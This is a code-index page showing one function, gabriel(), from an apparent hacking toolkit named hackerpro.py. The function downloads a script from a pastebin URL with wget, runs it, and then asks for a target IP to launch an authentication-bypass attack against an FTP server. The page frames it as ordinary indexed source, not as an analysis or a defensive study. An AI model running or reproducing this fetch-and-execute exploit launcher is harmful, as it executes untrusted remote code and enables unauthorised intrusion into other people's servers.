MCPcopy Index your code
hub / github.com/jaykali/hackerpro / gabriel

Function gabriel

hackerpro.py:266–272  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

264
265
266def gabriel():
267 print("Abusing authentication bypass of Open&Compact (Gabriel's)")
268 os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
269 clearScr()
270 os.system("python gabriel.py")
271 ftpbypass = raw_input("Enter Target IP and Use Command :")
272 os.system("python gabriel.py %s" % ftpbypass)
273
274
275def sitechecker():

Callers 1

expFunction · 0.85

Calls 1

clearScrFunction · 0.85

Tested by

no test coverage detected